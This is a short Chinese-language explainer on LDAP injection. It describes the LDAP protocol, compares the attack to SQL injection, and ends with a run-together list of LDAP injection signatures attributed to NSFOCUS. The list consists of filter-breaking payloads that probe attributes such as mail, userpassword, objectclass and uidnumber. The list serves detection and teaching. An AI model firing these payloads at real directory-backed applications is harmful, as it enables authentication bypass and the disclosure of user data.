LDAP注入

LDAP是轻量目录访问协议，英文全称是LightweightDirectoryAccessProtocol，一般都简称为LDAP。它是基于X.500标准的，但是简单多了并且可以根据需要定制。与X.500不同，LDAP支持TCP/IP，这对访问Internet是必须的。LDAP的核心规范在RFC中都有定义，所有与LDAP相关的RFC都可以在LDAPmanRFC网页中找到。简单说来，LDAP是一个得到关于人或者资源的集中、静态数据的快速方式。LDAP是一个用来发布目录信息到许多不同资源的协议。通常它都作为一个集中的地址本使用，不过根据组织者的需要，它可以做得更加强大。---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------LDAP注入方法跟SQL注入方法十分相像，都是通过攻击者构造语句进行攻击。不同之处在于我们不是使用SQL而是使用LDAP协议，同时测试的目标是LDAP服务器，而不是SQL服务器。LDAP协议运行在传输层协议上，Web应用程序可能在动态页面请求中利用用户输入来构建LDAP语句。执行ldap注入命令导致页面出错，进而暴露服务器信息。---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------NSFOCUS提供的LDAP注入特征*(|(mail=*))*(|(objectclass=*))admin*)((|userpassword=*)%2A%28%7C%28mail%3D%2A%29%29%2A%28%7C%28objectclass%3D%2A%29%29nsf)(@objectcategory@=*nsf)(|objectclass=wafwaf)(@gidnumber=nsfwaf)(|cn=*)test)(|admin=*)*)(cn=*)*))(cn=*)*)))(cn=*)*))))(cn=*)*)))))(cn=*)*))))))(cn=*)*)))))))(cn=*)*))))))))(cn=*)*)(objectcategory=*)*))(objectcategory=*)*)))(objectcategory=*)*))))(objectcategory=*)*)))))(objectcategory=*)*))))))(objectcategory=*)*)))))))(objectcategory=*)*)(objectclass=*)*))(objectclass=*)*)))(objectclass=*)*))))(objectclass=*)*)))))(objectclass=*)*))))))(objectclass=*)*)))))))(objectclass=*)*)(homedirectory=*)*))(homedirectory=*)*)))(homedirectory=*)*))))(homedirectory=*)*)))))(homedirectory=*)*))))))(homedirectory=*)*)))))))(homedirectory=*)*)(|(gidnumber=*))*))(|(gidnumber=*))*)))(|(gidnumber=*))*))))(|(gidnumber=*))*)))))(|(gidnumber=*))*))))))(|(gidnumber=*))*)))))))(|(gidnumber=*))*)(!(uidnumber=*))*))(!(uidnumber=*))*)))(!(uidnumber=*))*))))(!(uidnumber=*))*)))))(!(uidnumber=*))*))))))(!(uidnumber=*))*)))))))(!(uidnumber=*))